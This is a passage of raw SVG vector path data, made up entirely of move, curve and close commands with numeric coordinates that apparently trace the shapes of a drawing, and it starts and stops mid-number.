327.95,247.98316 328.175,247.53316 329,247 C 330,246.35375 330.08333,246.02552 329.25,246.01531 C 328.5625,246.00689 328,245.57577 328,245.05726 C 328,243.64692 337.74703,243.99636 341.43925,245.53906 C 344.21951,246.70073 347.96277,249.83361 346.87244,250.08632 C 346.6676,250.1338 344.26773,250.30562 341.53939,250.46815 C 338.81106,250.63068 336.41106,251.26683 336.20606,251.88183 C 335.71955,253.34134 334,253.33082 334,251.86833 z M 339.25,249.09861 C 339.6625,249.04438 341.2375,248.9478 342.75,248.884 C 344.85779,248.79509 345.03294,248.65131 343.5,248.26832 C 342.4,247.99349 341.27049,247.40637 340.98998,246.9636 C 340.70947,246.52083 339.24697,245.84911 337.73998,245.47088 C 335.18857,244.83051 335,244.99953 335,247.92678 C 335,250.6108 335.25584,250.93345 336.75,250.1338 C 337.7125,249.61868 338.8375,249.15285 339.25,249.09861 z M 334,247 C 334,246.56769 333.42143,245.99196 332.71429,245.7206 C 331.96463,245.43293 331.42857,245.96636 331.42857,247 C 331.42857,248.03364 331.96463,248.56707 332.71429,248.2794 C 333.42143,248.00804 334,247.43231 334,247 z M 350,250.5 C 350,249.5 351,249 353,249 C 355,249 356,249.5 356,250.5 C 356,251.5 355,252 353,252 C 351,252 350,251.5 350,250.5 z M 354.25,250.33772 C 353.5625,250.06031 352.4375,250.06031 351.75,250.33772 C 351.0625,250.61513 351.625,250.84211 353,250.84211 C 354.375,250.84211 354.9375,250.61513 354.25,250.33772 z M 38.923489,248.75847 C 38.881408,248.61631 38.692539,247.68739 38.503782,246.69419 C 38.226745,245.23649 38.434266,245.11552 39.580293,246.06664 C 40.710837,247.00491 41,246.90241 41,245.56343 C 41,244.63862 41.45,244.16008 42,244.5 C 42.55,244.83992 43,245.43323 43,245.81847 C 43,246.48189 39.085319,249.30518 38.923489,248.75847 z M 313,244.22357 C 313,243.79654 314.75044,243.61408 316.88987,243.81811 C 319.0293,244.02213 321.6168,243.99235 322.63987,243.75192 C 324.16503,243.3935 323.95976,243.07869 321.5,242.00373 C 319.85,241.28266 317.95373,240.57903 317.28607,240.44012 C 316.61841,240.30121 314.70591,239.21471 313.03607,238.02568 C 311.36623,236.83665 310,236.13101 310,236.45759 C 310,236.78416 308.67235,236.3648 307.04966,235.52568 C 303.86653,233.87962 300,233.49215 300,234.81923 C 300,235.26981 302.30063,236.26494 305.11251,237.03064 C 307.92439,237.79634 310.44753,239.00268 310.7195,239.71141 C 310.99146,240.42013 312.29083,241 313.60699,241 C 314.92314,241 316,241.48032 316,242.06739 C 316,243.46964 311.8463,242.23442 310.38976,240.39902 C 309.77912,239.62956 308.34318,239 307.19877,239 C 306.05437,239 304.82524,238.52625 304.46738,237.94721 C 304.10951,237.36818 303.29546,237.08144 302.65836,237.31001 C 302.02126,237.53858 300.21849,237.07802 298.65221,236.28654 C 294.7154,234.2972 292.16524,233.92362 291.36466,235.21899 C 290.91974,235.93888 291.42781,236.12139 292.84501,235.75078 C 294.03177,235.44044 294.77972,235.5474 294.50712,235.98847 C 294.23452,236.42955 294.71242,237.05941 295.56913,237.38815 C 296.42583,237.7169 296.84668,238.43905 296.50437,238.99294 C 295.56666,240.51018 294,240.20182 294,238.5 C 294,236.73436 293.51488,236.65408 290.99495,238.0027 C 288.1746,239.51211 287.74482,237.58836 290.35463,235.13657 C 292.11324,233.48444 294.0287,232.94509 298.57381,232.82224 C 301.83321,232.73414 305.4,233.12333 306.5,233.6871 C 307.6,234.25087 312.47087,236.64223 317.32416,239.00122 C 323.41328,241.9609 325.7379,243.55051 324.82416,244.12983 C 323.15443,245.18847 313,245.26898 313,244.22357 z M 35.75,241.60795 C 33.484329,239.88807 33.519804,239.06167 35.833333,239.66667 C 36.841667,239.93035 37.666667,240.78822 37.666667,241.57305 C 37.666667,242.35787 37.629167,242.98569 37.583333,242.9682 C 37.5375,242.9507 36.7125,242.3386 35.75,241.60795 z M 327.22894,240.81318 C 327.72722,239.31834 330,238.49529 330,239.80968 C 330,240.34667 329.2874,241.05947 328.41644,241.39369 C 327.44253,241.76742 326.98536,241.54393 327.22894,240.81318 z M 30.5,239 C 30.160081,238.45 30.331966,238 30.881966,238 C 31.431966,238 32.160081,238.45 32.5,239 C 32.839919,239.55 32.668034,240 32.118034,240 C 31.568034,240 30.839919,239.55 30.5,239 z M 25,237 C 25,236.45 25.701558,236 26.559017,236 C 27.416476,236 27.839919,236.45 27.5,237 C 26.700321,238.29391 25,238.29391 25,237 z M 1008.2405,236.01357 C 1006.4856,233.2034 1006.6663,232.12626 1009.5209,228.38378 C 1012.6697,224.25538 1015.2317,224.70527 1013.9535,229.16216 C 1012.806,233.16307 1010.6404,238 1009.9964,238 C 1009.713,238 1008.9228,237.10611 1008.2405,236.01357 z M 1012.6027,230.23661 C 1012.9906,228.29691 1012.8453,227 1012.24,227 C 1010.6585,227 1008.0975,231.51668 1008.4916,233.61093 C 1008.687,234.64992 1008.8814,235.70893 1008.9235,235.96429 C 1009.1685,237.45098 1012.0601,232.94933 1012.6027,230.23661 z M 325.63617,235.50574 C 325.95154,234.6839 326.61976,234.265 327.1211,234.57484 C 328.16968,235.2229 327.32792,237 325.97237,237 C 325.47209,237 325.3208,236.32758 325.63617,235.50574 z M 322.18333,233.78333 C 321.5325,233.1325 321,232.20786 321,231.72857 C 321,231.24929 321.72857,231.58571 322.61905,232.47619 C 323.50952,233.36667 324.04202,234.29131 323.80238,234.53095 C 323.56274,234.7706 322.83417,234.43417 322.18333,233.78333 z M 311.89953,229.7173 C 310.85161,228.91908 310.54037,227.81032 310.998,226.50571 C 311.62858,224.70807 311.86093,224.83039 313.37414,227.75662 C 315.12133,231.1353 314.62592,231.79402 311.89953,229.7173 z M 318.01531,227.97076 C 318.00689,227.12968 317.1,225.79284 316,225 C 314.9,224.20716 314,222.93404 314,222.17083 C 314,221.15905 313.25511,220.96715 311.25,221.46235 C 309.43686,221.91015 308.84068,221.80521 309.5,221.15434 C 311.35374,219.32434 314.21683,219.46919 315.36736,221.45116 C 315.99031,222.5243 317.28491,224.0993 318.24424,224.95116 C 319.49667,226.06328 319.71246,226.92295 319.00956,228 C 318.14376,229.32665 318.02886,229.32327 318.01531,227.97076 z M 1034.2292,221.8125 C 1034.4469,221.15938 1035.1597,220.44677 1035.8132,220.22894 C 1036.5439,219.98536 1036.7674,220.44253 1036.3937,221.41644 C 1035.6962,223.23415 1033.6292,223.61236 1034.2292,221.8125 z M 530.59656,217.15623 C 530.25051,216.59631 530.45466,215.83704 531.05022,215.46896 C 532.5877,214.51875 533.57969,215.82031 532.2962,217.1038 C 531.57802,217.82198 531.01868,217.83923 530.59656,217.15623 z M 526.66667,216.33333 C 525.40539,215.07205 526.00357,214 527.96862,214 C 529.30765,214 529.75315,214.47971 529.36163,215.5 C 528.746,217.10429 527.74664,217.41331 526.66667,216.33333 z M 535,216.19112 C 535,214.98122 538.03905,211 538.96262,211 C 540.17339,211 537.75162,215.86627 536.25,216.45072 C 535.5625,216.7183 535,216.60148 535,216.19112 z M 1039.5,215 C 1039.8399,214.45 1040.568,214 1041.118,214 C 1041.668,214 1041.8399,214.45 1041.5,215 C 1041.1601,215.55 1040.432,216 1039.882,216 C 1039.332,216 1039.1601,215.55 1039.5,215 z M 523,214.05902 C 523,213.47656 523.45,213 524,213 C 525.28138,213 525.28138,213.70806 524,214.5 C 523.45,214.83992 523,214.64148 523,214.05902 z M 1043.5433,208.07002 C 1043.2568,207.60657 1043.9174,206.99335 1045.0112,206.70731 C 1046.1051,206.42127 1047,206.54697 1047,206.98663 C 1047,208.16156 1044.1516,209.05429 1043.5433,208.07002 z M 525.27083,199.39583 C 525.60312,199.06354 526.46563,199.02802 527.1875,199.31689 C 527.98523,199.63611 527.74828,199.87307 526.58333,199.92105 C 525.52917,199.96447 524.93854,199.72813 525.27083,199.39583 z M 1029,197 C 1029,196.45 1029.675,196 1030.5,196 C 1031.325,196 1032,196.45 1032,197 C 1032,197.55 1031.325,198 1030.5,198 C 1029.675,198 1029,197.55 1029,197 z M 495.51008,182.01631 C 495.16462,181.45734 495.58352,181 496.44098,181 C 498.19751,181 498.45614,181.60006 497.0691,182.45729 C 496.5571,182.77373 495.85554,182.57528 495.51008,182.01631 z M 485.27083,179.39583 C 485.60312,179.06354 486.46562,179.02802 487.1875,179.31689 C 487.98523,179.63611 487.74828,179.87307 486.58333,179.92105 C 485.52917,179.96447 484.93854,179.72813 485.27083,179.39583 z M 1111,153.5 C 1111.6847,152.675 1112.9508,152 1113.8136,152 C 1115.0694,152 1114.9951,152.29285 1113.4411,153.4682 C 1110.9015,155.38905 1109.4162,155.4084 1111,153.5 z M 1128,141.55902 C 1128,141.31648 1128.45,140.83992 1129,140.5 C 1129.55,140.16008 1130,140.35852 1130,140.94098 C 1130,141.52344 1129.55,142 1129,142 C 1128.45,142 1128,141.80156 1128,141.55902 z M 1130.5703,138.11369 C 1130.269,137.62622 1131.0103,136.96907 1132.2176,136.65335 C 1134.7376,135.99437 1135.485,136.40618 1134.5411,137.93347 C 1133.7418,139.2268 1131.326,139.33644 1130.5703,138.11369 z M 1135.6978,135.2527 C 1134.5847,133.2749 1131.8733,119.93047 1132.1672,117.87651 C 1132.3502,116.59697 1133.4363,115.08528 1134.5807,114.51721 C 1135.7251,113.94914 1136.4837,112.95119 1136.2665,112.29954 C 1136.0345,111.60363 1137.3459,110.83813 1139.4445,110.44444 C 1141.4096,110.07578 1144.026,108.99921 1145.2587,108.05205 C 1147.8538,106.05807 1156.6572,101.36725 1159.3134,100.56311 C 1160.3107,100.26117 1160.8672,99.5941 1160.5499,99.080736 C 1159.927,98.072912 1155.724,99.006978 1152.0612,100.96722 C 1149.6677,102.24819 1147,101.72873 1147,99.981695 C 1147,99.262925 1147.5629,99.215643 1148.6797,99.84061 C 1150.4178,100.81332 1158,97.671435 1158,95.978488 C 1158,94.603718 1163.8077,93.790408 1165.7118,94.898525 C 1167.3292,95.8398 1167.2827,95.942087 1165.225,95.969591 C 1163.5464,95.992028 1162.8038,96.731093 1162.3923,98.788741 C 1161.9829,100.83554 1161.1907,101.63076 1159.4148,101.77774 C 1158.084,101.88789 1155.2051,103.10795 1153.0174,104.489 C 1150.8297,105.87005 1148.7758,107 1148.4531,107 C 1148.1305,107 1146.4341,108.02974 1144.6833,109.28831 C 1142.9325,110.54689 1140.9375,111.60439 1140.25,111.63831 C 1137.4547,111.77626 1136.9105,112.0462 1137.5012,113.00187 C 1137.8417,113.5529 1136.9683,114.44176 1135.5602,114.97712 C 1132.4471,116.16072 1132.3015,118.65938 1134.7959,128.09244 C 1136.4493,134.34509 1136.6552,134.63308 1138.7913,133.67992 C 1140.03,133.1272 1141.3075,131.6231 1141.6301,130.33749 C 1141.9906,128.90127 1142.9583,128 1144.1398,128 C 1145.1974,128 1146.3533,127.2125 1146.7084,126.25 C 1147.5493,123.97108 1148.9902,123.0342 1151.6836,123.01531 C 1153.3086,123.00392 1153.9481,122.3067 1154.1836,120.28955 C 1154.4055,118.38859 1155.2466,117.37306 1157,116.88923 C 1158.375,116.5098 1158.885,116.1545 1158.1334,116.09968 C 1157.2739,116.03699 1156.9608,115.25775 1157.2897,114 C 1157.6217,112.7308 1157.3204,112 1156.4654,112 C 1153.6195,112 1154.0024,109.83095 1157.4371,106.49543 C 1159.4297,104.56029 1162.0055,103.04254 1163.2561,103.06661 C 1164.4903,103.09036 1168.8737,102.67499 1172.9972,102.14356 C 1177.1207,101.61213 1181.154,101.54644 1181.9602,101.99759 C 1182.8862,102.51582 1185.1474,101.94553 1188.1011,100.44877 C 1190.6724,99.145776 1193.8391,97.85116 1195.1381,97.57185 C 1196.4372,97.292539 1199.3,96.610345 1201.5,96.055863 C 1203.7,95.501381 1207.975,95.026972 1211,95.001621 L 1216.5,94.955528 L 1214,93 C 1212.625,91.924459 1211.95,91.016449 1212.5,90.982198 C 1213.05,90.947948 1212.3186,90.277972 1210.8747,89.493364 C 1209.4308,88.708756 1207.2813,88.25325 1206.098,88.481128 C 1204.9147,88.709007 1204.1864,88.50741 1204.4795,88.033136 C 1204.7726,87.558863 1204.4472,86.953411 1203.7562,86.687688 C 1203.0653,86.421966 1205.2577,86.393237 1208.6282,86.623846 C 1216.1204,87.136463 1220.8324,85.707855 1218.9862,83.483427 C 1218.3091,82.667542 1218.1477,81.94257 1218.6276,81.872377 C 1222.8059,81.261158 1224,81.431003 1224,82.636536 C 1224,83.502364 1225.1622,84 1227.1843,84 C 1228.9356,84 1232.3458,84.957192 1234.7625,86.127094 C 1238.547,87.9591 1239.4908,88.075301 1241.5659,86.964709 C 1243.3746,85.996745 1243.7088,85.354005 1242.9061,84.386912 C 1242.0555,83.361953 1242.7839,83.154378 1246.4693,83.371481 C 1249.0172,83.521569 1251.2898,83.340188 1251.5195,82.968412 C 1252.1148,82.005184 1247.6264,80.123807 1242.9487,79.375798 C 1239.6262,78.844523 1239.0601,78.993113 1239.5494,80.268033 C 1239.8722,81.109349 1239.7632,82.028313 1239.3071,82.310174 C 1238.1996,82.994685 1235.5368,80.928277 1234.7194,78.75 C 1234.3583,77.7875 1233.1126,77 1231.9513,77 C 1230.7901,77 1226.1538,75.698961 1221.6485,74.108802 C 1214.5627,71.607806 1197.1712,69 1187.5779,69 C 1185.7079,69 1185.4513,71.611936 1187.25,72.337719 C 1188.1193,72.688495 1188.0432,72.88945 1187,72.997564 C 1186.175,73.083066 1184.6,73.320881 1183.5,73.52604 C 1182.4,73.7312 1180.15,73.13427 1178.5,72.199529 C 1176.1683,70.878574 1173.2725,70.53328 1165.5,70.649405 C 1160,70.731578 1154.6,70.92556 1153.5,71.080475 C 1150.2683,71.535603 1145.8243,69.900267 1146.3772,68.459381 C 1147.168,66.398622 1144.6624,66 1130.9182,66 C 1122.4634,66 1118,65.632769 1118,64.937142 C 1118,64.35257 1117.2125,63.985575 1116.25,64.121598 C 1113.6536,64.488525 1108,62.980172 1108,61.920545 C 1108,60.486039 1103.2143,60.837845 1099.9805,62.510065 C 1096.5268,64.296062 1094.9637,64.121021 1093.1933,61.75 C 1091.5511,59.550643 1080.8749,59.240891 1079.1311,61.342009 C 1078.5185,62.080114 1078.3134,62.980114 1078.6753,63.342009 C 1079.8531,64.519791 1059.656,64.60671 1054.25,63.447125 C 1052.0961,62.985124 1051,63.129436 1051,63.875 C 1051,64.49375 1050.325,65 1049.5,65 C 1048.675,65 1048,65.43875 1048,65.975 C 1048,67.46477 1041.8893,65.975146 1038.6147,63.687114 C 1036.0149,61.870626 1035.8941,61.550598 1037.3941,60.453808 C 1038.9368,59.325696 1038.9284,59.183948 1037.2794,58.518612 C 1036.3007,58.123755 1033.2891,57.627575 1030.587,57.415991 C 1027.8848,57.204407 1024.9108,56.789092 1023.9782,56.493068 C 1023.0455,56.197045 1021.7137,56.640004 1021.0187,57.477422 C 1019.3274,59.515367 1006.7524,59.529549 1001,57.5 C 996.18851,55.802408 988,55.487466 988,57 C 988,58.366582 985.38634,58.25822 983.04249,56.794461 C 981.51815,55.842495 978.734,55.924297 969.80606,57.183362 C 963.58773,58.060304 957.6,59.089532 956.5,59.470536 C 954.53682,60.150517 954.53542,60.134386 956.42373,58.594356 C 957.48179,57.731453 959.95679,56.734575 961.92373,56.379072 C 963.89068,56.023569 966.625,55.177971 968,54.499964 C 969.375,53.821957 973.5375,52.674542 977.25,51.950154 C 980.9625,51.225765 984,50.265639 984,49.816541 C 984,49.367444 983.6625,49.053289 983.25,49.118421 C 981.30941,49.424829 979.93702,48.910924 980.4555,48.071996 C 981.42249,46.507381 977.19953,45.79235 968.65538,46.074001 C 964.04264,46.226056 959.27714,45.833981 957.6849,45.171418 C 956.1366,44.527138 953.8866,43.959415 952.6849,43.909812 C 951.16705,43.847158 951.56546,43.514151 953.98987,42.819064 C 956.52181,42.093147 958.01572,42.153235 959.43242,43.037975 C 960.50639,43.708684 966.23781,44.616552 972.16891,45.055459 C 982.64009,45.830339 987.65733,47.452345 986.18394,49.586325 C 985.80777,50.131139 983.925,51.564513 982,52.771601 C 980.075,53.978689 979.03594,54.973888 979.69098,54.983153 C 980.34602,54.992419 981.16008,54.55 981.5,54 C 981.83992,53.45 982.87898,53.006891 983.80902,53.015313 C 985.26629,53.028509 985.29269,53.164601 984,54 C 982.12065,55.214527 981.63268,55.142527 993.43364,55.391924 C 1000.1036,55.532885 1003.4986,55.99581 1003.767,56.800929 C 1004.0301,57.590449 1006.72,58 1011.6424,58 C 1015.7881,58 1018.8716,57.601245 1018.5648,57.104785 C 1017.4023,55.223953 1021.3198,55.044003 1033.8217,56.403958 C 1036.1986,56.66252 1038.7375,57.367147 1039.4636,57.969795 C 1041.2203,59.427763 1042.1029,63 1040.7064,63 C 1038.556,63 1041.4864,64.826289 1044.1719,65.159796 C 1045.8157,65.363939 1048.0509,64.599189 1049.9808,63.172287 C 1052.4218,61.367597 1053.426,61.108645 1054.5063,62.005263 C 1055.7282,63.019321 1060.4413,63.310128 1071.75,63.069231 C 1073.7895,63.025786 1074.9069,62.534429 1074.75,61.75 C 1074.6094,61.046957 1075.7033,60.361544 1077.25,60.183578 C 1078.7625,60.009545 1080,59.498864 1080,59.04873 C 1080,57.54854 1110.7193,60.319343 1112.3683,61.968262 C 1112.9357,62.535718 1114.4084,63 1115.641,63 C 1116.8735,63 1118.16,63.449788 1118.4997,63.99953 C 1118.8623,64.586142 1124.1538,64.958812 1131.3087,64.901636 C 1142.9274,64.808789 1149.6973,66.062771 1148.4523,68.07713 C 1147.7635,69.191672 1149.4262,70.021193 1152.1607,69.927247 C 1153.4473,69.883044 1158.775,69.767493 1164,69.670467 C 1169.225,69.573441 1174.625,69.153416 1176,68.737077 C 1179.0222,67.821983 1182.2915,69.489183 1180.1655,70.861262 C 1179.1372,71.524875 1179.2839,71.84098 1180.8048,72.238694 C 1182.9347,72.795683 1186.0439,71.52271 1184.1452,70.871051 C 1183.484,70.644112 1183.4006,69.958281 1183.9305,69.105211 C 1184.6622,67.9274 1186.9445,67.895497 1198.6015,68.900127 C 1211.7615,70.034295 1225.5198,73.068965 1234,76.708007 C 1235.925,77.534067 1239.525,78.329445 1242,78.475514 C 1244.475,78.621583 1248.1706,79.549619 1250.2124,80.537817 C 1253.5665,82.161136 1253.7595,82.460094 1252.2124,83.635467 C 1251.2706,84.350976 1249.2359,84.950705 1247.691,84.968197 C 1246.146,84.985688 1245.1038,85.358986 1245.375,85.797746 C 1245.6462,86.236506 1245.4978,87.194608 1245.0452,87.926861 C 1243.932,89.728089 1233.1082,88.445529 1232.331,86.420301 C 1231.9872,85.524199 1230.3249,85 1227.8273,85 C 1225.65,85 1222.9438,84.505104 1221.8136,83.900232 C 1220.6476,83.276197 1220.0224,83.227184 1220.3683,83.786925 C 1221.1321,85.022704 1219.3667,86.452099 1215.5625,87.678227 C 1212.6566,88.61482 1212.6458,88.645833 1214.5625,90.5625 C 1218.2292,94.229172 1217.1074,95.450259 1209.5,96.073234 C 1202.3823,96.656106 1187.7274,101.11151 1185,103.52176 C 1183.7563,104.62081 1183.1921,104.62149 1181.6985,103.52574 C 1179.7337,102.08443 1172.4083,102.55266 1170.25,104.2575 C 1169.4105,104.92066 1169,104.88662 1169,104.15383 C 1169,103.55247 1168.2623,103.34585 1167.3564,103.69349 C 1166.4524,104.04038 1164.5702,104.38523 1163.1738,104.45983 C 1161.7774,104.53442 1160.4388,105.1837 1160.1991,105.90267 C 1159.8942,106.81729 1160.3743,107.01598 1161.7975,106.56426 C 1164.7173,105.63757 1165.3866,107.50283 1162.5913,108.77644 C 1161.1003,109.45581 1159.8972,109.49716 1159.2899,108.88989 C 1158.2167,107.81669 1155,108.72931 1155,110.10699 C 1155,110.59814 1156.1801,111 1157.6224,111 C 1159.9512,111 1160.0912,111.18623 1158.8724,112.66262 C 1157.8025,113.95881 1157.7755,114.41796 1158.75,114.74595 C 1161.1109,115.54057 1160.0781,118 1157.3834,118 C 1155.1275,118 1154.8331,118.34662 1155.2476,120.51503 C 1155.6445,122.59109 1155.2721,123.12929 1153.1142,123.59855 C 1148.4459,124.61375 1147.9018,124.94881 1148.2031,126.62303 C 1148.3852,127.63475 1147.7265,128.39302 1146.5,128.58361 C 1145.4,128.75454 1143.6,129.9854 1142.5,131.31884 C 1140.1937,134.11458 1136.3185,136.35569 1135.6978,135.2527 z M 1162,96.531385 C 1162,95.639301 1161.4134,95.287868 1160.5057,95.63617 C 1159.6839,95.95154 1159.2605,96.612416 1159.5648,97.104785 C 1160.4374,98.516708 1162,98.148774 1162,96.531385 z M 976.5,54 C 976.83992,53.45 976.66803,53 976.11803,53 C 975.56803,53 974.83992,53.45 974.5,54 C 974.16008,54.55 974.33197,55 974.88197,55 C 975.43197,55 976.16008,54.55 976.5,54 z M 1224,133 C 1224,132.45 1224.7016,132 1225.559,132 C 1226.4165,132 1226.8399,132.45 1226.5,133 C 1225.7003,134.29391 1224,134.29391 1224,133 z M 1228.125,133.125 C 1228.5432,131.87026 1230,131.57891 1230,132.75 C 1230,133.1625 1229.4938,133.66875 1228.875,133.875 C 1228.2562,134.08125 1227.9188,133.74375 1228.125,133.125 z M 1216,132 C 1216,130.71862 1216.7081,130.71862 1217.5,132 C 1217.8399,132.55 1217.6415,133 1217.059,133 C 1216.4766,133 1216,132.55 1216,132 z M 121.19876,128.89007 C 117.58839,125.36026 117.81896,124 122.02763,124 C 124.20972,124 124.79257,124.37699 124.35866,125.50772 C 124.04045,126.33697 124.51495,128.13697 125.4131,129.50772 C 127.81197,133.16886 125.18078,132.78323 121.19876,128.89007 z M 1235.6649,131.00033 C 1236.8717,130.51372 1239.0844,130.50374 1240.6649,130.97776 C 1243.1146,131.71251 1242.8203,131.83116 1238.5,131.85066 C 1234.6799,131.8679 1234.0109,131.66724 1235.6649,131.00033 z M 1191.5,129 C 1191.1601,128.45 1191.557,128 1192.382,128 C 1193.207,128 1194.1601,128.45 1194.5,129 C 1194.8399,129.55 1194.443,130 1193.618,130 C 1192.793,130 1191.8399,129.55 1191.5,129 z M 1256.4243,128.08368 C 1258.3694,125.93429 1260,125.36693 1260,126.83948 C 1260,127.3012 1258.7712,128.23886 1257.2693,128.92317 C 1254.5454,130.16424 1254.5433,130.16213 1256.4243,128.08368 z M 0,125.5 C 0,124.675 0.675,124 1.5,124 C 2.325,124 3,124.675 3,125.5 C 3,126.325 2.325,127 1.5,127 C 0.675,127 0,126.325 0,125.5 z M 1168.9985,121.45361 C 1167.55,120.65197 1167.1304,120.06241 1168,120.05075 C 1169.7862,120.02679 1172.6423,121.69104 1171.9695,122.3638 C 1171.7096,122.6237 1170.3727,122.21411 1168.9985,121.45361 z M 305,118.12244 C 305,116.70496 307.82392,114.77314 308.91252,115.44594 C 310.47276,116.41021 309.00117,119 306.89301,119 C 305.85186,119 305,118.6051 305,118.12244 z M 43.302767,114.43753 C 41.629599,113.17518 41.733638,112.98697 44.75,111.81946 C 46.5375,111.1276 48,110.21018 48,109.78076 C 48,109.35134 49.097033,109 50.437851,109 C 54.39153,109 53.324839,112.56902 48.845249,114.32865 C 45.680565,115.57178 44.828336,115.58852 43.302767,114.43753 z M 27.107001,109.08729 C 26.340852,108.60215 23.415852,108.38474 20.607001,108.60417 C 17.79815,108.8236 15.965056,108.66492 16.533458,108.25156 C 17.101859,107.8382 17.541497,106.825 17.510429,106 C 17.468577,104.88858 16.423686,104.55739 13.476972,104.72153 C 10.879276,104.86623 8.6697857,104.30689 7.1061797,103.10874 C 4.1198702,100.82042 5.1290336,98.758834 8.8112854,99.625438 C 12.264668,100.43818 14.033117,102 11.5,102 C 10.18795,102 9.9209465,102.32095 10.637161,103.03716 C 11.331977,103.73198 12.525185,103.75082 14.252082,103.09426 C 16.33499,102.30234 16.954552,102.43918 17.479471,103.8071 C 17.836766,104.73819 17.987551,105.725 17.814549,106 C 17.285578,106.84084 27.431429,107.76662 28.5,106.97501 C 29.743733,106.05365 36,106.93409 36,108.03049 C 36,108.47241 34.437807,108.71003 32.52846,108.55853 C 30.619113,108.40704 29.295671,108.66939 29.587477,109.14154 C 30.272142,110.24935 28.894566,110.21922 27.107001,109.08729 z M 1.25,104.34923 C -1.0748323,103.38973 -0.018750877,101.865 2.75,102.18358 C 4.2625,102.35761 5.5,102.94384 5.5,103.4863 C 5.5,104.61955 3.0904039,105.10879 1.25,104.34923 z M 425.5201,102.75814 C 423.5545,101.74973 421.39587,101.01492 420.72314,101.12523 C 417.64492,101.62998 413.23796,99.29637 409.05627,94.947279 C 399.67274,85.188122 397.59231,82.451024 397.31502,79.5 C 396.92043,75.300593 398.12457,73.908758 402.34185,73.689619 C 405.02525,73.550184 405.99222,73.05247 405.99552,71.809017 C 406.00086,69.792032 404.33075,68.507738 403.79451,70.116471 C 403.29883,71.603511 395.38273,71.782729 393.93958,70.339583 C 393.13869,69.53869 393.11766,68.648659 393.86658,67.249295 C 394.73493,65.626777 394.52634,65.105217 392.67104,64.259884 C 390.41777,63.233227 389.7806,59.782055 391.36962,57.210956 C 391.84352,56.44418 391.59933,56.216521 390.68098,56.568925 C 389.89839,56.869234 388.99205,56.421666 388.6669,55.574329 C 388.31717,54.662953 387.4309,54.281155 386.49696,54.63954 C 385.62865,54.972742 384.9899,54.852656 385.07753,54.372681 C 385.51766,51.961783 384.7658,51 382.44098,51 C 381.03352,51 380.11421,50.624224 380.39806,50.164943 C 381.34275,48.636402 368.7241,47.04723 361,47.721984 C 350.59789,48.63068 345.54038,48.33971 341.74913,46.614441 C 339.96211,45.801227 337.6,44.948844 336.5,44.720255 C 334.66417,44.338756 334.70522,44.215254 337,43.215706 C 339.43974,42.15302 339.41564,42.123551 336,41.993101 C 334.075,41.919582 331.66887,41.532366 330.65305,41.132621 C 326.16025,39.364621 333.50234,37.45144 349,36.351825 C 356.11095,35.847278 359.849,34 353.75902,34 C 351.75648,34 349.90063,33.648233 349.63491,33.218296 C 349.3692,32.78836 351.93014,32.498648 355.3259,32.574493 C 358.72165,32.650338 361.725,33.069321 362,33.505566 C 362.75837,34.708609 355.81709,36.802412 349.29903,37.336753 C 328.43049,39.047522 325.81919,40.836053 343.49405,41.312698 C 350.82034,41.510269 354.49885,41.996537 354.76766,42.802979 C 355.04619,43.638564 353.25434,44.045241 348.83333,44.149832 C 345.0634,44.23902 343.71424,44.500667 345.5,44.796277 C 348.48275,45.290036 348.48563,45.296882 346,45.98725 C 344.625,46.369148 349.125,46.552808 356,46.395385 C 375.38124,45.951594 387.32468,48.925668 391.62421,55.266277 C 392.65589,56.78773 394.7375,58.58508 396.25,59.260389 C 397.7625,59.935697 399,60.814249 399,61.212727 C 399,61.611204 399.675,61.678209 400.5,61.361626 C 401.32569,61.044778 402,61.331751 402,62 C 402,62.667688 402.6271,62.973338 403.39355,62.679223 C 405.08629,62.029657 408.47721,65.471829 409.93513,69.319685 C 410.78962,71.574913 410.68807,72.454788 409.42785,73.715002 C 408.14884,74.994016 408.10145,75.448649 409.17611,76.130005 C 410.23502,76.801372 410.19977,76.996154 409,77.10317 C 408.175,77.176757 406.89234,77.153551 406.14965,77.051601 C 405.40695,76.949651 405.07496,77.312277 405.41189,77.857436 C 405.74882,78.402596 405.23148,79.07534 404.26224,79.352422 C 403.29301,79.629505 404.3,79.668737 406.5,79.439606 L 410.5,79.023003 L 407.25,80.040094 C 403.22282,81.300404 403.18649,81.820448 407.032,83.161 C 409.63109,84.067046 409.88095,84.443304 408.782,85.796211 C 407.69778,87.130971 407.75722,87.278178 409.16724,86.750373 C 410.17141,86.374489 411.05963,86.713 411.40059,87.601528 C 411.75576,88.527106 411.14837,89.379488 409.77039,89.889233 L 407.5741,90.701696 L 409.81506,91.901021 C 411.04758,92.56065 411.79186,93.527769 411.46899,94.050173 C 411.14613,94.572578 411.56116,95 412.39129,95 C 413.22142,95 414.26048,95.609307 414.70031,96.354015 C 416.20196,98.896568 420.01943,100.17251 424.07486,99.487352 C 426.64276,99.053509 428,99.20038 428,99.912102 C 428,101.87158 431.85654,101.05255 434.34438,98.564713 C 436.45992,96.449172 436.56436,96.045157 435.13983,95.487602 C 433.79801,94.962418 433.99977,94.581388 436.25,93.390952 C 437.7625,92.590797 439,91.500497 439,90.968063 C 439,90.435628 439.7875,89.993109 440.75,89.984687 C 442.24555,89.971601 442.2819,89.828426 441,89 C 439.7517,88.193285 439.8356,88.014809 441.5,87.936365 C 442.6,87.884522 442.9375,87.615132 442.25,87.337719 C 440.21525,86.516679 440.82691,84.721472 442.95205,85.277211 C 444.02568,85.557971 445.03818,85.398468 445.20205,84.922761 C 445.36592,84.447053 446.4,83.919306 447.5,83.749989 C 448.6,83.580672 450.175,83.005158 451,82.47107 C 451.825,81.936981 454.87158,81.468581 457.77018,81.430181 C 461.65212,81.378753 463.75945,80.776453 465.77018,79.143686 C 467.27158,77.924514 469.31295,76.659293 470.30656,76.332084 C 471.35934,75.985387 471.88352,75.13884 471.56285,74.303188 C 471.14036,73.20221 471.53361,73.042557 473.25629,73.61567 C 477.59746,75.059917 492.58175,73.622762 496.94978,71.343208 C 498.3524,70.611221 500.08906,70.009549 500.80902,70.006161 C 503.51841,69.993409 500.87606,68.204343 497.57941,67.819478 C 495.6879,67.598654 494.30197,67.679579 494.49957,67.999311 C 494.98674,68.787568 486.96499,69.087092 484.6343,68.36767 C 482.96262,67.85167 483.05078,67.606665 485.48202,66.011796 C 487.37226,64.771817 487.78658,64.068914 486.84772,63.694855 C 485.99394,63.354689 486.23299,63.103201 487.5,63.008662 C 489.5,62.859429 489.5,62.859429 487.5,61.909189 C 485.80128,61.102093 485.8766,61.050399 488,61.566028 C 489.375,61.899921 492.4345,62.516155 494.79888,62.935436 C 497.16327,63.354718 499.61577,64.215769 500.24888,64.848883 C 500.882,65.481997 502.3225,66.044856 503.45,66.09968 C 505.22347,66.185914 